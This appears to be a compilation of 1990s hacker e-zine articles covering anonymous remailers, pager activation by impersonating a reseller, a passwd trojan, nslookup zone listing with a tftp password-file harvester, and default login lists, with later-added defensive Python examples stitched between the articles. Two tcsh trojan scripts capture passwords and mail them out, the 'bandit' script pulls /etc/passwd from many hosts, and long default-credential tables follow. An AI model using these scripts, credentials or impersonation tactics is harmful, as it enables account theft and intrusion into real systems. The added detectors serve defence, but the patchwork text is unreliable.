$remailer{"enigma"} = " cpunk mix pgp hash latent cut ek ksub";
$remailer{"ain"} = " cpunk pgp";

catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.

JPUNIX.COM offers a domain hiding service for remailers. Send email to perry@jpunix.com for more information. NOTE: JPUNIX.COM itself does not run a remailer. All subdomains of jpunix.com on this list are remailers that are not physically located on jpunix.com

Use "premail -getkeys pgpkeys@kiwi.cs.berkeley.edu" to get PGP keys for the remailers. Fingering this address works too.
Last ping: Tue 28 Feb 95 11:00:01 PST

remailer email address                  history       latency  uptime
-----------------------------------------------------------------------
tower    remailer@tower.techwood.org    *******+****     4:14  99.99%
mix      mixmaster@nately.ucsd.edu      +--+-.++++-+  1:02:45  99.99%
xs4all   remailer@xs4all.nl             ***+*+******     7:22  99.99%
myriad   remailer@myriad.pc.cc.cmu.edu  +*******+*+*    16:07  99.99%
alumni   hal@alumni.caltech.edu         ************     4:44  99.99%
portal   hfinney@shell.portal.com       ************     3:28  99.99%
penet    anon@anon.penet.fi             --+-----+*++  2:11:46  99.99%
c2       remail@c2.org                  +++++++-++++    28:41  99.98%
q        q@c2.org                       +-+--++-++-+    54:56  99.98%
usura    usura@replay.com               *****+******     6:10  99.97%
bsu-cs   nowhere@bsu-cs.bsu.edu         **-******+**     5:45  99.97%
syrinx   syrinx@c2.org                  +.-****-+***    58:44  99.94%
nately   remailer@nately.ucsd.edu       +-++..++++++    46:08  99.93%
vox      remail@vox.xs4all.nl           -.---------  11:35:52  99.99%
ideath   remailer@ideath.goldenbear.com -----------   4:10:11  99.83%
rahul    homer@rahul.net                **********+      6:47  99.74%
hroller  hroller@c2.org                 * *****-****     9:29  99.66%
bonafide remailer@bonafide.jpunix.com   ********+* *    15:18  99.59%
flame    tomaz@flame.sinet.org          ********+*+*    14:40  99.58%
ain      remailer@ain.jpunix.com        *+              10:21  99.52%
charon   charon@styx.jpunix.com         ++*****-+* *    23:47  99.38%
enigma   mix@enigma.jpunix.com          -             3:45:34  99.46%
ford     ford@prefect.jpunix.com        + ++..++++ +  1:15:43  99.34%
eniac    vanklava@eniac.ac.siue.edu     ********** *     6:04  98.73%
soda     remailer@csua.berkeley.edu     .._.._._-.    8:51:18  98.63%
aegis    aegis@athena.jpunix.com        *.-*** -+* +  1:56:51  98.12%
vanka    vanka@eniac.ac.siue.edu        * **** ** ++    16:38  97.88%
rebma    remailer@rebma.mn.org          .- --+ ---   11:12:00  85.29%
extropia remail@extropia.wimsey.com     - __         20:47:48  30.69%
desert   remail@desert.xs4all.nl                     78:44:55   2.24%

History key
* # response in less than 5 minutes.
* * response in less than 1 hour.
* + response in less than 4 hours.
* - response in less than 24 hours.
* . response in more than 1 day.
* _ response came back too late (more than 2 days).
Options and features

cpunk    A major class of remailers. Supports Request-Remailing-To: field.
eric     A variant of the cpunk style. Uses Anon-Send-To: instead.
penet    The third class of remailers (at least for right now). Uses X-Anon-To: in the header.
pgp      Remailer supports encryption with PGP. A period after the keyword means that the short name, rather than the full email address, should be used as the encryption key ID.
oldpgp   Remailer does not like messages encoded with MIT PGP 2.6. Other versions of PGP, including 2.3a and 2.6ui, work fine.
hash     Supports ## pasting, so anything can be put into the headers of outgoing messages.
ksub     Remailer always kills subject header, even in non-pgp mode.
nsub     Remailer always preserves subject header, even in pgp mode.
latent   Supports Matt Ghio's Latent-Time: option.
cut      Supports Matt Ghio's Cutmarks: option.
post     Post to Usenet using Post-To: or Anon-Post-To: header.
ek       Encrypt responses in reply blocks using Encrypt-Key: header.
special  Accepts only pgp encrypted messages.

--------------------------END INSERTED FILE #3--------------------------------

-- SIGNING AND ITS SIGNIFICANCE

What is Signing?

Signing a plaintext message is a way of letting people know that it was really you who sent the message. That is another key feature of public key cryptosystems. Signing a message does a number of things. It creates an encrypted block at the bottom of your message containing information about the message, your public key id, etc.. Therefore the message cannot be altered and still pass a signature check. The signature check verifies that you are who you say you are, and that the message has not been altered since your signature.

Signing someone's public key is another useful validation technique. If you sign someone's public key, it is saying that you know that they are who they say they are.

Needless to say, it would be quite a pain in the ass to have to encrypt, sign, chain, etc..
everything manually, and that is one of the main reasons I've heard a lot of people say they don't use encryption, because it's too much of a hassle to deal with it. Well, hopefully the next section here will cure some of those woes.

-- WAYS TO EASE THE PAIN

Well, I do realize this seems like quite a painful process, but there are a lot of helpful tools out there to make it a bit easier to use these services. I will also rate each program on a 4 star rating scale. This has nothing to do with the quality of the program, but with how useful it is in real use applications as rated by ME. If you want to form your own opinions, feel free, get these programs!

PGPSH32A.ZIP - PGP Shell vers 3.2a. A Nice tool to automate key management,
  * * x        signing, etc. Main Drawback: No external editor support, built
               in editor sucks. (2.5 * would be 4 if it could support a real
               editor.)

PGPBLU17.ZIP - PGP Interface for Blue Wave Offline Mail Reader. Easy to use
  * * * *      signing, encrypting, etc.. All wrapped up in a nice interface.
               Easy to install, easy to use. BW2.10+ supports QWK too, so you
               can use it with your email and usenet.

CHAIN.ZIP    - Also comes in a tgz archive for unix. Automates chaining
  * * *        mail through anon remailers. You can configure it to keep your
               favorite ones handy. Comes with DOS executable and C source.
               (Note: The .tgz archive is actually a completely different
               package. It is a set of perl scripts designed to help chain
               remailers. These packages are by different authors also.)

DOSBAT.ZIP   - For unix, look for scripts.tar.z. A collection of batch files
  * * * |      (or scripts) that automates lots of things in regard to
               chaining remailers. Creates reply blocks, chains messages,
               etc.. A great package.

MEDUSA1B.ZIP - Medusa's Tentacles - Great system using a fuzzy logic algorithm
  * * * *      to strip all identifying information from an anon post/mail
               message. VERY cool.

MESS11B.ZIP  - Message Encryption and Signing System. Nice if you want to keep
  * *          your public key on whatever system you use for mail. Otherwise
               it seems a lot like the PGPBLUE interface. Not recommended
               unless you are sending mail from your local site. If you are,
               then it is an excellent substitute for PGPBLUE.

premail0.30.tar.gz - An excellent script package for preparing your mail for
  * * *        the long journey through the remailing chain.

APGP212.ZIP  - Also comes as source for unix as autopgp*.tar.gz. AutoPGP is
  * * *        a nice pre-post mail handler for QWK packets. It will search
               your packet for encrypted messages/mail, new keys, etc..
               before you get to the mail. A nice package overall.

Also, if you really get into it, the source for remailers and such is widely available. You can run your own quite easily.

These are but a few of MANY, MANY good programs to help streamline your encryption needs. A couple of places to start are:

ftp.csua.berkeley.edu /pub/cypherpunks - This is the main cypherpunk ftp site. You can find a lot of interesting stuff here.

ftp.dsi.unimi.it /pub/security/crypto - Here you can find a bunch of illegally exported crypto. Everything imaginable is probably on this site.

Also: check out the web links from http://www.csua.berkeley.edu/cypherpunks.html
All in all, the cypherpunks home page sucks, but it is a good place to find other good crypto links.

-- IN CLOSING

I hope this file has been somewhat helpful in demonstrating the need for the use of cryptography in your everyday communications. In researching this file, I have learned a few extra things myself. Enjoy, and Encrypt.

Great and mighty thanks be to:

Phil Zimmermann (For being a hero for the cause of privacy!)
Matt Ghio (Author of the remailer help file)
Raph Levien (Author of the remailer information file and operator of the remailer pinging service (from which the file was derived))
And to the author of the chaining help file, whoever he or she may be.
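
The message format described in the remailer help file above (a :: block naming the next hop, optional ## header pasting, Cutmarks and Latent-Time) is shown here from the remailer's side, as an added example that is not part of the original files and is not any remailer's actual source. The addresses, the sample message, and the rule that an absolute Latent-Time already past today means tomorrow are assumptions.

```python
from datetime import datetime, timedelta

# Header names are matched exactly: the help file says most remailers are case-sensitive.
ROUTING_HEADERS = ("Request-Remailing-To", "Anon-To")
MAX_DELAY = timedelta(hours=24)

# Constructed sample body: two hops, then pasted headers, a delay and a signature to cut.
SAMPLE = """\
::
Request-Remailing-To: hop2@remailer.example

::
Anon-To: mail2news@gateway.example
Latent-Time: +15:30
Cutmarks: --

##
Subject: Ignore this test
Newsgroups: alt.test

This is an anonymous test.

--
sam@sender.example - this is my .sig
"""


def take_block(lines, marker):
    """Split off a pseudo-header block that starts with marker ('::' or '##').

    Returns (headers, remaining_lines); the block ends at the first blank line.
    """
    if not lines or lines[0].strip() != marker:
        return {}, lines
    headers = {}
    i = 1
    while i < len(lines) and lines[i].strip():
        name, sep, value = lines[i].partition(":")
        if not sep:
            raise ValueError(f"not a header line: {lines[i]!r}")
        headers[name.strip()] = value.strip()
        i += 1
    return headers, lines[i + 1:]


def parse_latent_time(value, now):
    """Turn a Latent-Time value into a delay: '+HH:MM' is relative, 'HH:MM' absolute."""
    relative = value.startswith("+")
    hours, minutes = (int(part) for part in value.lstrip("+").split(":"))
    if hours < 0 or not 0 <= minutes < 60:
        raise ValueError("time out of range")
    if relative:
        delay = timedelta(hours=hours, minutes=minutes)
    else:
        # Assumption: an absolute time that has already passed today means tomorrow.
        target = now.replace(hour=hours, minute=minutes, second=0, microsecond=0)
        if target <= now:
            target += timedelta(days=1)
        delay = target - now
    if delay > MAX_DELAY:
        raise ValueError("delay exceeds the 24-hour maximum")
    return delay


def process_hop(body, now):
    """Do what one remailer does with a message body; returns what it would send on."""
    control, rest = take_block(body.splitlines(), "::")
    dest = next((control[h] for h in ROUTING_HEADERS if h in control), None)
    if dest is None:
        raise ValueError("no remailing request header")
    pasted, rest = take_block(rest, "##")      # headers copied to the output as-is
    mark = control.get("Cutmarks")
    if mark:
        for i, line in enumerate(rest):
            if line.startswith(mark):          # drop this line and everything after it
                rest = rest[:i]
                break
    while rest and not rest[-1].strip():       # trim blank lines left before the cut
        rest.pop()
    delay = timedelta(0)
    if "Latent-Time" in control:
        delay = parse_latent_time(control["Latent-Time"], now)
    return {"to": dest, "delay": delay, "headers": pasted, "body": "\n".join(rest) + "\n"}


if __name__ == "__main__":
    clock = datetime(1995, 3, 22, 18, 0)
    hop = process_hop(SAMPLE, clock)
    print("hop 1 forwards to", hop["to"])
    hop = process_hop(hop["body"], clock)
    print("hop 2 delivers to", hop["to"], "after", hop["delay"], "with", hop["headers"])
    print(hop["body"], end="")
```

Each hop sees only its own :: block; the second hop's destination, delay and cutmarks stay inside the body that the first hop forwards.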
Ghost in the Machine
gitm@alpha.c2.org

-----------------------------------------------------------------------------
Time For a Change presents

pagers...PAGERS...pAgErS...PaGeRs...PagerS...
by Major
------------------------------------------------------------------------------

BASICS (stuff you already know)
-------------------------------

Pagers are radio receivers, capable of decoding and displaying numeric, and sometimes alpha, messages. Pagers operate in a state of perpetual reception, and whenever the system sends a message keyed to a particular pager, the pager responds by giving an alert (either audible beeps, or vibration), and displays the message.

SERVICE
--------------------------------

Pager service is cheap. Damn cheap. A month's worth of service should cost less than $10. So, there isn't much of a financial reason to have to hack free paging service. But...

There are very few companies that provide paging service in any given area, yet there are multitudes of companies that sell the service. These are "agents" or "resellers".

In order to activate your pager (you do have a pager, don't you?), you will need to know a couple of things about it: its capcode, and its frequency. Generally, both of these are printed on the pager itself (on the back, on stickers). The capcode consists of six digits, but often times letters will be scattered in as well. Discard the letters, keep the numbers, and you have your capcode. The frequency will be in a XXX.XXXX format.

Your next step will be to find out which paging company uses the frequency in your pager in your area. A few phone calls will do the trick. Simply call and ask. It may take a while to find someone with enough technical knowledge to answer you, but once you find someone who knows it shouldn't be hard to get the information from them. Simply tell them you have a pager on (xxx.xxxx frequency) and want to know if it can be used on their system.
The next step will be to find out which "agents" sell service for the company you have targeted. This is easy, too. In fact, while you are on the phone asking about frequencies, you can ask for a list of authorized agents. The yellow pages will also yield some results.

Enough of the easy stuff, on to the hard part. Social engineering skills are essential here. When an agent sells a pager to a customer, they must activate the pager with the paging company. This is done either through a dial-up system, where the agent enters the pager info in the paging company's computer, or over the phone, where the agent calls the paging company, relays the information, and the company enters the information into their computer.

To activate your own pager, you will need to assume the identity of an agent, and call the paging company. The conversation should be fairly simple.

"Hi, this is KewlHac from ABC Paging, I need to activate a pager."
"Sure thing!"
"Okay, the capcode is 123456."
"Fine. The number for that pager will be 555-6969."
"Thanks, have a good day."

Done. If ABC paging usually activates its pagers via computer, you might add "Sorry to bother you, but my computer is down...could you help me out?" A trip to ABC Paging, posing as a potential customer should tell you if this is the case.

How long will it last? Depends on how sharp ABC Paging is. At worst, 555-6969 should remain valid for at least a month; at best, who knows. Enjoy it while you can.

HARDWARE
--------

One word: Motorola. This is, of course, a matter of personal preference, but I have found Motorola products to be of the highest quality. Also, since Motorola pagers dominate the market, it is easier to find support for their products. The Motorola family of alpha-pagers includes The Bravo, Bravo Plus, Bravo Express, the Encore, and the Lifestyle Series (essentially Bravos, in redesigned cases).
Literature from pager companies will explain the features available in these pagers, as well as pagers from other manufacturers, so I won't bother reproducing that here.

Most Motorola pagers are programmable via a PC interface (the exception being the Bravo, which requires a dedicated programmer). I have seen some Motorola pager programming software on bbs's, but without cables and a "pager interface box" (essentially, an rs-232 to tty converter), the software is useless. Any decent service center will have the hardware and software required to read and program your pager. Shop around until you find one that is hacker-friendly, or can be social-engineered into carrying out your wishes.

Unlike a cellular ESN, a pager's CAPCODE can easily be changed with the programming software. The frequency (in a synthesized pager) can also be changed, within a given range. Other options, such as timestamping (12 or 24 hour), alert-tone volume, etc., are available for alteration via the programming software.

-------------------------------------------------------------------------------

-----------------------------------------------------------------------------
Time For a Change presents

passwd trojan
by Terminal
------------------------------------------------------------------------------

Here I will be presenting two scripts, (more of an idea really)... That you may use to get passwords from people's accounts you are using via rlogin... I am not a super script writer, and that is why I present it as more of an idea, with an example or two...

If you get on someone's account, you may want to hide this file, for this example we will assume it is named ".hiddenf"... So you could put this in the user's home directory, and then add to the user's .login an alias for "/bin/passwd/" and "passwd", with "$HOME/.hiddenf" being run instead, so that anytime after that, when they try to change their password, they will really run the script...
This script never erases itself, because then you would never get the NEW password...

---BEGIN SCRIPT ONE---
#!/bin/tcsh
echo -n "Changing password for $USER on "
hostname
echo -n "Old password: "
stty -echo
echo $<>$HOME/.tym
stty echo
echo ""
mail me@my.anon.mail.service.org<$HOME/.tym
rm $HOME/.tym
echo
echo "Sorry."
---END SCRIPT ONE---

Now this next script is a bit different, in that it prompts for both old and new passwords, and then gives an 'error' of "Incorrect Password"... and erases itself... With this you would sort of have to hope the user chooses the same "New Password" the second time it is run.. (The real passwd binary that is)... When 'installing' this you would probably once again want to hide it, and alias "/bin/passwd" and "passwd" to run the hidden file..

---BEGIN SCRIPT TWO---
#!/bin/tcsh
echo -n "Changing password for $USER on ";hostname
echo -n "Old password: "
stty -echo
echo $<>$HOME/.tym
echo ""
echo -n "New password: "
echo $<>>$HOME/.tym
echo ""
stty echo
mail me@my.anon.mail.service.org<$HOME/.tym
rm $HOME/.tym
echo "Error: Incorrect Password"
rm -f $0
unalias /bin/passwd
unalias passwd
---END SCRIPT TWO---

Now you may think "Why would the user want to change his/her password anytime soon?".. Well, to get them to change passwords you could send fakemail 'from' their root.. saying that the password file has been tampered with, and that they need to change passwords.. maybe even saying "please use at least one upper case letter, and a number", or something to make it sound real... Or if you could think of any other way to scare the user into changing it, that would also work...

I hope this helps someone.
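One way to check for the alias substitution described above, as an added example that is not part of the original article: the Python code below scans the text of a shell startup file for aliases that replace `passwd`, whether named bare or by path. The sample file is constructed, and watching `su` and `login` as well is an assumption of this example.

```python
import re

# "passwd" is the command the article targets; watching "su" and "login"
# as well is an assumption of this example.
WATCHED = {"passwd", "su", "login"}

# csh/tcsh form: alias NAME VALUE     sh/ksh/bash form: alias NAME=VALUE
ALIAS_RE = re.compile(r"^\s*alias\s+(?P<name>[^\s=]+)(?:\s*=\s*|\s+)(?P<value>.+?)\s*$")

# Constructed sample of a tampered ~/.login, following the article's description.
SAMPLE_LOGIN = """\
# constructed sample
set path = (/bin /usr/bin /usr/local/bin)
alias ls 'ls -F'
alias /bin/passwd/ $HOME/.hiddenf
alias passwd $HOME/.hiddenf
# alias su /tmp/x
"""


def _unquote(text):
    """Strip one pair of matching quotes, if present."""
    if len(text) >= 2 and text[0] == text[-1] and text[0] in "'\"":
        return text[1:-1]
    return text


def find_shadowing_aliases(rc_text, watched=WATCHED):
    """Return (line number, alias name, target, reasons) for each alias that
    replaces a watched command, whether named bare or by path."""
    findings = []
    for lineno, line in enumerate(rc_text.splitlines(), 1):
        if line.lstrip().startswith("#"):
            continue  # commented-out lines are not active aliases
        match = ALIAS_RE.match(line)
        if not match:
            continue
        name = _unquote(match.group("name"))
        words = _unquote(match.group("value")).split()
        command = name.rstrip("/").rsplit("/", 1)[-1]
        if command not in watched or not words:
            continue
        target = words[0]
        reasons = ["alias shadows '%s'" % command]
        if "/" in name:
            reasons.append("alias name is a path")
        if target.rsplit("/", 1)[-1].startswith("."):
            reasons.append("target is a hidden file")
        if target.startswith(("$HOME", "${HOME}", "~")):
            reasons.append("target is under the home directory")
        findings.append((lineno, name, target, reasons))
    return findings


if __name__ == "__main__":
    for finding in find_shadowing_aliases(SAMPLE_LOGIN):
        print(finding)
```

Run it over the contents of each user's `.login`, `.cshrc`, `.tcshrc` and `.profile`; any hit on a credential-handling command deserves a look at the target file.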
============================================================================
Time For a Change presents
nslookup: Utility From The Gods
by Panther Modern
------------------------------------------------------------------------------

The nslookup utility is one that at a glance, does not show itself to be largely useful to the hacker populace at large. However, by exploiting this system to its full extent, nslookup proves invaluable. In TFC Issue One, Article One, Ghost in The Machine pointed out several ways to find new domain names. The nslookup utility will give you a method to find ALL hosts. nslookup also allows one to find real machines within a domain, eliminating hassle when scanning through domains looking for machine names. All in all, the nslookup utility is one of previously undefined wealth and value to those who know how to correctly exploit its virtues.

Section 1: A Bit About nslookup

nslookup follows the client-server model, in that your nslookup client will act as a gateway for you to access information contained on the server, which in most cases will be entitled ns.domain.com, domain.com being the root domain. On occasion, domain.com will have several name servers, these usually denoted by ns1.domain.com, ns2.domain.com, etc. Also generally noted will be domain name servers in another domain's hierarchical setup. There are no rules regarding naming of domain name servers.

By using a domain's given name service, one is able to determine any information one requires about the given domain's systems, thus enabling one to eliminate previous scanning techniques. Everything which the name server knows, the name server tells. Everything which the name server knows, your client knows. Finally, Everything Which The Name Server Knows, YOU Know.

Section 2: Finding New Domains

nslookup is invaluable at finding new domains. The first step in doing so is to connect via your nslookup client to one of several major domain name servers located around the net.
In this example, I will use the server at ns.internic.net. The following commands should be executed. . .

    $ nslookup
    Default Server:  ns.domain.com      <-- This is the server for your site
    Address:  127.0.0.1

    > server ns.internic.net            <-- We will proceed to go to this server
    Default Server:  ns.internic.net
    Address:  198.41.0.4

Now that we are in our server, we will continue, and find ourselves a listing of every educational name server which our base name server knows about. By getting this list, we can thus determine the names of the domains. This same procedure can also be followed for COM, ORG, as well as country sites, such as IL and PL. For military and government information, it is recommended that server nic.ddn.mil be used.

    > ls EDU                            <-- All educational name servers.
    [ns.internic.net]
     edu.                   server = NS.INTERNIC.NET
     edu.                   server = AOS.ARL.ARMY.MIL
     edu.                   server = NS1.ISI.edu
     edu.                   server = C.PSI.NET
     edu.                   server = TERP.UMD.edu
     edu.                   server = NS.NASA.GOV
     edu.                   server = NIC.NORDU.NET
     edu.                   server = NS.ISC.ORG
     edu.                   server = NS.NIC.DDN.MIL
     caltech                server = DELILAH.CCSF.CALTECH.edu
     caltech                server = SAMPSON.CCSF.CALTECH.edu
     caltech                server = TYBALT.CALTECH.edu
     TYBALT.CALTECH         131.215.139.100
     caltech                server = NS1.LBL.GOV
     caltech                server = PUN.CIS.OHIO-STATE.edu
     caltech                server = gap.cco.caltech.edu
     gap.cco.caltech        131.215.139.43
     caltech                server = gap-gw.cco.caltech.edu
     gap-gw.cco.caltech     131.215.139.43
     caltech                server = hot.CALTECH.edu
     hot.CALTECH            131.215.9.49

I have cut out all servers that were given to me except for the top-level servers, and the caltech servers, for ease of display. I recommend that when doing a listing such as this, you output it to a file. This is done simply by doing a

    > ls EDU > EDU

This will output to a file called EDU.

The top-level servers listed above are those servers which our current name server knows of that can also give similar listings of complete domains. All secondary servers are mainly meant to give listings of their sites.
By sorting through our file, EDU, we can now find out new and different .edu sites that we've never heard of before.

Section 3: Using Our New Domain Information

Let us pretend that I have never heard of domain caltech.edu before. Wow! It's a new domain! I wonder what some of its systems are? Let's find out.

    $ nslookup
    Default Server:  ns.domain.com
    Address:  127.0.0.1

    > server hot.caltech.edu
    Default Server:  hot.caltech.edu
    Address:  131.215.9.49

    > ls caltech.edu
    [hot.caltech.edu]
     caltech.edu.           server = gap.cco.caltech.edu
     gap.cco                131.215.139.43
     caltech.edu.           server = gap-gw.cco.caltech.edu
     gap-gw.cco             131.215.139.43
     caltech.edu.           server = tybalt.caltech.edu
     tybalt                 131.215.139.100
     caltech.edu.           131.215.139.3
     caltech.edu.           131.215.51.153
     zoo-mac                131.215.44.19
     grayver-ppp            131.215.198.103
     photon                 131.215.156.14
     bettys                 131.215.139.180
     102-Keck-Photo         131.215.9.60

The caltech.edu name server gave us first and foremost a listing of all other caltech.edu name servers. This will probably be useless, but sometimes, if one is patient and bored, one can go through every name server, and find sites not listed in the base name servers. However, I find this to be superfluous, and boring, as stated above.

Anyway, we are also given a list of every site at caltech.edu. These sites are real, and we have just eliminated the need for ip-scanning to find sites in a given domain. We have them all, and we are very happy.

As a side note, for clarity, I have cut out all but these few sites. The output files for large sites such as these can sometimes be well over 150k worth of site names and ip addresses.

Section 5: Using Our Sites For Fun and Profit and Other Stuff

Now we have a huge list of sites. One may hack them one by one, or use our big list to find things. For instance, one can grep through our list for "dial" and attempt to find dialouts. Be creative. Look for decservers, or whatever types of systems you specialize in hacking by grepping through lists for their names.
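The `ls` listings in Sections 2 and 3 are DNS zone transfers, and a name server that limits transfers to its own secondaries (in BIND, the `allow-transfer` option) refuses them. As an added example that is not part of the original article, this Python code reviews name server logs for transfer requests from hosts outside that set; the log lines are constructed and modelled on BIND 9's message format, and the addresses, zone names and secondaries list are assumptions.

```python
import re
from collections import defaultdict

# Assumption: the only hosts permitted to pull the zone (your secondaries).
ALLOWED_SECONDARIES = {"192.0.2.53"}

CLIENT = r"client (?:@0x[0-9a-f]+ )?(?P<ip>[0-9a-fA-F.:]+)#\d+"
# A transfer the server agreed to send.
STARTED = re.compile(CLIENT + r".*transfer of '(?P<zone>[^/']+)/IN': .*XFR started")
# A transfer the server refused.
DENIED = re.compile(CLIENT + r".*zone transfer '(?P<zone>[^/']+)/[AI]XFR/IN' denied")

# Constructed log lines (documentation address ranges, made-up zone names).
SAMPLE_LOG = [
    "06-Mar-2024 10:15:01.101 xfer-out: info: client @0x7f10a4 192.0.2.53#41234 "
    "(example.edu): transfer of 'example.edu/IN': AXFR started (serial 2024030601)",
    "06-Mar-2024 11:02:44.870 xfer-out: info: client @0x7f10b8 198.51.100.7#50311 "
    "(example.edu): transfer of 'example.edu/IN': AXFR started (serial 2024030601)",
    "06-Mar-2024 11:03:10.002 security: error: client @0x7f10c2 203.0.113.9#55123 "
    "(example.edu): zone transfer 'example.edu/AXFR/IN' denied",
    "06-Mar-2024 11:03:12.440 security: error: client @0x7f10c2 203.0.113.9#55124 "
    "(cs.example.edu): zone transfer 'cs.example.edu/AXFR/IN' denied",
    "06-Mar-2024 11:04:00.000 queries: info: client @0x7f10d0 203.0.113.9#55125 "
    "(www.example.edu): query: www.example.edu IN A +",
]


def review_transfers(lines, allowed=ALLOWED_SECONDARIES):
    """Return {ip: {"served": [zones], "denied": [zones]}} for every client
    outside `allowed` that requested a zone transfer."""
    report = defaultdict(lambda: {"served": [], "denied": []})
    for line in lines:
        for outcome, pattern in (("served", STARTED), ("denied", DENIED)):
            match = pattern.search(line)
            if match and match.group("ip") not in allowed:
                report[match.group("ip")][outcome].append(match.group("zone").lower())
    return dict(report)


def alerts(lines, allowed=ALLOWED_SECONDARIES):
    """One line per finding: LEAK if the whole zone was handed over,
    PROBE if the request was refused."""
    out = []
    for ip, result in sorted(review_transfers(lines, allowed).items()):
        if result["served"]:
            out.append("LEAK %s pulled %s: restrict transfers to secondaries"
                       % (ip, ", ".join(result["served"])))
        if result["denied"]:
            out.append("PROBE %s was refused %s" % (ip, ", ".join(result["denied"])))
    return out


if __name__ == "__main__":
    print("\n".join(alerts(SAMPLE_LOG)))
```

A LEAK line means the server handed its full host list to an outside client, which is the condition the article depends on; adjust the two patterns to your server's actual log output before relying on them.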
Okay, so this isn't as fun as sex, and won't get you any monetary profit. But do it anyway.

Section 5a: tftp Scanning Using nslookup Output

I originally taught myself use of the nslookup system in order to scan tftp. By using this system, I am able to tftp scan much more quickly, by only hitting real sites. On one run, I was tftp scanning 16 colleges at once for a 10 hour period, and ended up with over 400 password files.

Step one: Get nslookup lists of your favorite domains, and output them to files, using the above method.

Step two: Cut the first two lines off of your file, using vi, or your favorite editor. Then, execute the following commands. (domain.edu being our assumed file)

    $ cat domain.edu | grep -v server > domain2.edu

This will remove useless lines.

    $ rm domain.edu
    $ cat domain2.edu | cut -c1-32 > domain.edu

This will leave you with only ip numbers.

Step three: Utilize the scanner. I would recommend nohupping it.

    $ nohup `bandit domain.edu` &

Step four: Wait several hours for the scanner to finish (depending on domain size), then harvest your many password files.

File: bandit
----------------------------Cut Here------------------------------------
#/bin/ksh
#TFTP Bandit
#By Panther Modern
#Usage: nohup `bandit ` &
#
PDIR="~/pdir" # Define your Password Directory here.
function testcomp {
tftp $1 << eof
verbose
timeout 7
trace
get /etc/passwd $1
eof
}
for i in `cat $1`
do
testcomp $i > /dev/null
if [ -s $i ]
then
cp $i /$PDIR/$i
fi
rm $i
done
----------------------------Cut Here-----------------------------------

--- Endnote ---

If anyone encounters problems with anything in this file, or finds an error, I would appreciate a report. Such reports can be directed to Ghost in the Machine at his email address, or to Panther Modern on quality boards in the 303 NPA.

------------------------------------------------------------------------------
Time For a Change presents
Operating System Identification and default accounts.
v0.01 by Taking Your Machine ------------------------------------------------------------------------------ ##### AS/400 - Easily identified by: UserID? Password? Some defaults: UserID Password ------ -------- qsecofr qsecofr / 1111111 / 2222222 qsysopr qpgmr qpgmr ibm password / 2222 / service qsvr qsvr secofr secofr ##### Gandalf XMUX Consoles - (Gandalf) Only known prompt: Password> Gives you 3 tries. VERY Common Passwords: console gandalf system xmux Also found on XMUX's are the Logger and Machine LCN's. Use ports 2 and 3 respectively to reach these. (Note I have only seen these on Datapac, and other X.2X networks.) ##### HP 2000/3000 MPE/xx (Hewlett Packard) Customizable login prompt, but the default is: : EXPECTED HELLO, :JOB, :DATA, OR (CMD) AS LOGON. (CIERR 1402) : hello mgr.telesup ENTER ACCOUNT (TELESUP) PASSWORD: hponly ENTER ACCOUNT (TELESUP) PASSWORD: telesup ENTER ACCOUNT (TELESUP) PASSWORD: remote INCORRECT PASSWORD. (CIERR 1441) From the : prompt type HELLO ., . A fairly long list of defaults follows. USER.ACCOUNT JOBS PASSWORDS --------------- -------- ----------- ADVMAIL.HPOFFICE DATA HP FIELD.HPWORD PUB HPONLY FIELD.HPP187 SYS LOTUS FIELD.SERVICE MANAGER FIELD.SUPPORT MGR MAIL.HPOFFICE MPE MAIL.MAIL REMOTE MAIL.TELESUP TELESUP MANAGER.COGNOS MANAGER.HPOFFICE MANAGER.ITF3000 MANAGER.SECURITY MANAGER.SYS MANAGER.TCH MANAGER.TELESUP MGE.VESOFT MGR.CAROLIAN MGR.CCC MGR.CNAS MGR.CONV MGR.COGNOS MGR.HPDESK MGR.HPWORD MGR.HPOFFICE MGR.HOPNLY MGR.HPP187 MGR.HPP189 MGR.HPP196 MGR.INTX3 MGR.ITF3000 MGR.NETBASE MGR.REGO MGR.RJE MGR.ROBELLE MGR.SECURITY MGR.SYS MGR.TELESUP MGR.VESOFT MGR.WORD MGR.XLSERVER OPERATOR.COGNOS OPERATOR.DISC OPERATOR.SYS OPERATOR.SYSTEM OPERATOR.SUPPORT PCUSER.SYS RSBCMON.SYS SPOOLMAN.HPOFFICE WP.HPOFFICE ##### PrimeOS - VERY Common on X.25/29 networks. Default connect notification: PRIMENET 23.2.0.r26 P6450 Then type LOGIN to get the User id? prompt. User id? SYSTEM Password? 
SYSTEM Defaults: login password ----- -------- system system / prime mail mail prime prime / primos primos_cs prime / primos primenet primenet mfd mfd tele tele netlink netlink test test guest guest guest1 guest / guest1 ##### System 75 - Login: Password: If you enter an incorrect login name, it will instantly give you: INCORRECT LOGIN Common defaults follow: Login Password ----- -------- bcim bcimpw bciim bciimpw bcms bcmspw / bcms bcnas bcnspw blue bluepw browse looker / browsepw craft crftpw / craftpw / craft cust custpw enquiry enquirypw field support inads indspw / inadspw / inads init initpw kraft kraftpw locate locatepw maint maintpw / rwmaint nms nmspw rcust rcustpw support supportpw tech field ##### UNIX (various flavors, various manufacturers) - UNIX is easily recognized by it's prompts: login: Password: Login incorrect There are infinite combinations of possible login prompt setups, /etc/issue files (which are shown before login), etc.. Nonetheless, UNIX usually identifies itself quite easily. Note: the only "default" most UNIX's come with that is usable is root. However, the following is a list of commonly found accounts. If it is actually a default, it will be noted what flavor of UNIX it is found on. 
login Password ----- -------- root root sys sys or system or bin sysadm sysadm or admin sysadmin sysadmin or admin bin sys or bin sysbin sysbin daemon daemon lp lp or bin lpadm lpadm lpadmin lpadmin checkfs checkfs checkfsys checkfsys checksys checksys mountfs mountfs mountfsys mountfsys mountsys mountsys umountfs umountfs umountfsys umountfsys umountsys umountsys powerdown powerdown trouble trouble adm adm rje rje unix unix uucp uucp uucpadm uucpadm nuucp nuucp anon anon user user games games install install setup setup demo demo sync sync admin admin guest guest informix informix oracle oracle snake (no password - Linux) satan (no password - Linux) gonzo (no password - Linux) EZsetup (no password - IRIX) demos (no password - IRIX) OutOfBox (no password - IRIX) 4Dgifts (no password - IRIX) tutor (no password - IRIX) ##### VM/CMS (International Business Machines) - Customizable logon screen, but the default is: VM/370 ONLINE--VM/3084--PRESS BREAK KEY TO BEGIN SESSION ! Enter one of the following commands : LOGON userid (Example: LOGON VMUSER1) DIAL userid (Example: DIAL VMUSER2) MSG userid message (Example: MSG VMUSER2 GOOD MORNING) LOGON USERIDS ------- $ALOC$ TEMP TDISK CPNUC DIRECT SAVSYS SYSERR SYSCKP SYSWRM AUTOLOG1 CMSBATCH 